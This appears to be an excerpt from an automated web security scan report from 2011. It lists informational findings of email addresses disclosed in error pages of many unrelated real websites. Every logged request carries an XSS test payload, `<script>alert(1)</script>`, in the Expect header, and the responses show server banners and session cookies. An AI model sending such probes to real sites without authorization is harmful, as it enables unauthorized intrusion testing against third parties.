lowed.",dateSuchAs:"Please enter a valid date such as {date}",dateInFormatMDY:'Please enter a valid date such as MM/DD/YYYY (i.e. "12/31/1999")',email:'Please enter a valid email address. For example "fred@domain.com".',url:"Please enter a valid URL such as http://www.cnet.com.",currencyDollar:"Please enter a valid $ amount. For example $100.00 .",oneRequired:"Please enter something for at least one of these input
...[SNIP]...
ame,C);}A.getChildren().inject(A,"before");this.fireEvent("onAfterInsert",[A.getParent(),B]);A.dispose();}})});try{FormValidator.resources.enUS.email='Please enter a valid e-mail address. For example "fred@domain.com".';FormValidator.add("validate-email",{errorMsg:FormValidator.getMsg.pass("email"),test:function(A){return FormValidator.getValidator("IsEmpty").test(A)||/^[^@]+@([a-zA-Z0-9\-]+\.)+[a-zA-Z]{2,}$/.test
...[SNIP]...

25.2. http://www.3xgate.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.3xgate.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.3xgate.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 03:09:38 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 323

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.<P>
<HR>
<ADDR
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

25.3. http://www.advocatehealth.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advocatehealth.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.advocatehealth.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:31:06 GMT
Content-Length: 281


<!--
    Build Date: 12/29/2010 10:47:56 AM
SiteMaker Release: SM7.1

Code created by:
Medseek, Inc.
2028 Village Lane
Solvang, CA. 93463
Phone 1-888 MEDSEEK
email info@medseek.com
http://www.medseek.com
(c) 1999-2010 Medseek, Inc. All rights reserved.
    -->
...[SNIP]...

25.4. http://www.allstraponlesbians.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allstraponlesbians.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allstraponlesbians.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 00:42:55 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.6
Content-Type: text/html; charset=iso-8859-1
Content-Length: 508

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

25.5. http://www.bauerfinancial.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bauerfinancial.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bauerfinancial.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:24:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 5906
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCARSATQR=AKBCLNNDJBOJJGCHABIOMGKI; path=/
Cache-control: private


<html>
<head>
<title>Page could not be found</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<link href="/shared/style.css" rel="stylesheet" type="text/css
...[SNIP]...
<a href="mailto:customerservice@bauerfinancial.com">
...[SNIP]...
<a href="mailto:customerservice@bauerfinancial.com">customerservice@bauerfinancial.com</a>
...[SNIP]...

25.6. http://www.bestchubby.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bestchubby.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bestchubby.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.37
Date: Wed, 04 May 2011 02:38:06 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Language: en
Expires: Wed, 04 May 2011 02:38:06 GMT
Content-Length: 1023

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<link rev="made" href="mailto:root@ndu031.xpower.net" />
...[SNIP]...
<a href="mailto:root@ndu031.xpower.net">
...[SNIP]...

25.7. http://www.birdmovies.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.birdmovies.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.birdmovies.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:20:03 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.6
Content-Type: text/html; charset=iso-8859-1
Content-Length: 500

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

25.8. http://www.boysbi.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boysbi.net
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.boysbi.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:04:59 GMT
Server: Apache/1.3.39 (Unix) PHP/4.4.8
Content-Type: text/html; charset=iso-8859-1
Content-Length: 496

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

25.9. http://www.buzz-media.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buzz-media.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzz-media.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:29:44 GMT
Server: Apache
Content-Length: 508
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:webmaster@multi14.buzznet.com">
...[SNIP]...

25.10. http://www.cabra2u.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cabra2u.net
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cabra2u.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.10
Date: Wed, 04 May 2011 03:06:47 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Language: en
Expires: Wed, 04 May 2011 03:06:48 GMT
Content-Length: 1006

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<link rev="made" href="mailto:root@xpower.net" />
...[SNIP]...
<a href="mailto:root@xpower.net">
...[SNIP]...

25.11. http://www.camzone.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.camzone.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.camzone.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:11:02 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.6 mod_ssl/2.8.31 OpenSSL/0.9.7e-p1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 497

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@i2bnetworks.com">
...[SNIP]...

25.12. http://www.cbv.ns.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbv.ns.ca
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cbv.ns.ca
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:04:15 GMT
Server: Apache/2.2.17 (EL)
Content-Length: 504
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:jmacneil@cbvrsb.ca">
...[SNIP]...

25.13. http://www.cellphoneaccents.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cellphoneaccents.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cellphoneaccents.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 29256
Content-Type: text/html
Expires: Wed, 04 May 2011 00:54:27 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSARADRQQ=OJIHEJKDLJLKNGNBLHDHHAIJ; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:54:26 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></meta>
<title>Cell Phone Accessories . Di
...[SNIP]...
<a href="mailto:webmaster@cellphoneaccents.com?subject=From%20ASP%20Error%20Page">
...[SNIP]...
<a href="mailto:webmaster@cellphoneaccents.com?subject=From%20ASP%20Error%20Page">
...[SNIP]...

25.14. http://www.cern.ch/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cern.ch
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cern.ch
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 01:15:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3493


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>CERN web site not found</title>
...[SNIP]...
<a href="mailto:Web.Support@cern.ch">
...[SNIP]...

25.15. http://www.concordia.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.concordia.ca
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.concordia.ca
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:35:19 GMT
Server: Apache
Content-Length: 498
Cneonction: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:webadmin@concordia.ca">
...[SNIP]...

25.16. http://www.continentalkennelclub.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.continentalkennelclub.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.continentalkennelclub.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 2614
Content-Type: text/html
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:35:11 GMT

...<HTML>    
<HEAD>
<TITLE>Page not found CKC Continental Kennel Club</TITLE>
       <META http-equiv="Content-Type" content="text/html; charset=utf-8">
               
   </HEAD>
   <BODY style="MARGIN: 0px; BACKGRO
...[SNIP]...
<A href="mailto:webmaster@continentalkennelclub.com?subject=File-Not-Found Error">webmaster@continentalkennelclub.com
                                                                       </A>
...[SNIP]...

25.17. http://www.conversiontrac.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.conversiontrac.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.conversiontrac.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:46:08 GMT
Server: Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.7e-p1
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 504

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:hostmaster@conversiontrac.com">
...[SNIP]...

25.18. http://www.crazyblogs.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crazyblogs.net
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.crazyblogs.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:13:38 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.9
Content-Type: text/html; charset=iso-8859-1
Content-Length: 500

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

25.19. http://www.cullmantimes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cullmantimes.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cullmantimes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Expectation failed
Server: squid
Date: Wed, 04 May 2011 01:45:22 GMT
Content-Type: text/html
Content-Length: 1396
X-Squid-Error: ERR_INVALID_REQ 0
X-Cache: MISS from cache4.peak.zope.net
Via: 1.0 cache4.peak.zope.net:8500 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR
...[SNIP]...
<A HREF="mailto:sa@zope.com">sa@zope.com</A>
...[SNIP]...

25.20. http://www.cutegalleries.info/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cutegalleries.info
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cutegalleries.info
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Wed, 04 May 2011 01:37:12 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Content-Length: 331

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.<P>
<HR>
<ADDR
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

25.21. http://www.dmwili.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dmwili.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dmwili.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Wed, 04 May 2011 00:54:34 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Content-Length: 323

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.<P>
<HR>
<ADDR
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

25.22. http://www.elitemovs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elitemovs.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elitemovs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:24:47 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.10
Content-Type: text/html; charset=iso-8859-1
Content-Length: 499

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

25.23. http://www.elitewifes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elitewifes.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elitewifes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:18:42 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.10
Content-Type: text/html; charset=iso-8859-1
Content-Length: 500

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

25.24. http://www.engcen.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.engcen.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.engcen.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 04:08:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8241
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCDRTQRB=JPCCMCGACJDGOGODPJCKKOPG; path=/
Cache-control: private


<html>
<head>
<title>Engineering jobs, resumes & careers - engineers employment search</title>

<link rel="stylesheet" type="text/css" href="http://www.engcen.com/include/engcen.css">
<link rel
...[SNIP]...
<a href="mailto:admin@engcen.com">
...[SNIP]...
<a href="mailto:admin@engcen.com">
...[SNIP]...

25.25. http://www.fcps.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fcps.org
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fcps.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404
Date: Wed, 04 May 2011 00:45:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3247
Content-Type: text/html
Cache-control: private


<html>
<head>
   <Title>Page not found</Title>
</head>
<body bgcolor=white>

       <center>
<TABLE border="0" cellPadding="5" cellSpacing="0" width="100%" align="center">
<TBODY>

...[SNIP]...
<A HREF="mailto:webmaster@fcps.org">
webmaster@fcps.org
</A>
...[SNIP]...

25.26. http://www.fhainfo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fhainfo.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fhainfo.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 00:41:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 19564
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCARQRAQ=FMFPCJEAGBIKDFKPJABOFIDH; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<meta name="keywords" content="fha mortgage insurnace, MIP, MMI, PMI, fha mortgage insurance, loan requirements,fha annual
...[SNIP]...
<!--

//Disable right click script III- By Renigade (renigade@mediaone.net)
//For full source code, visit http://www.dynamicdrive.com

var message="";
///////////////////////////////////
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(
...[SNIP]...

25.27. http://www.genealinks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.genealinks.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.genealinks.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:09:01 GMT
Server: Apache/1.3.20 (Unix) PHP/4.0.6
Content-Type: text/html; charset=iso-8859-1
Content-Length: 483

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@genealinks.com">
...[SNIP]...

25.28. http://www.ghettodoorway.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ghettodoorway.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ghettodoorway.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Wed, 04 May 2011 03:23:53 GMT
Content-Type: text/html
Content-Length: 5120
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<div style="font-family:arial; font-size:14px; float:left;">
cs@adultdoorway.com
</div>
...[SNIP]...

25.29. http://www.goladyboy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goladyboy.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.goladyboy.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:24:40 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.9
Content-Length: 527
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:webmaster@advancedhosters.com">
...[SNIP]...

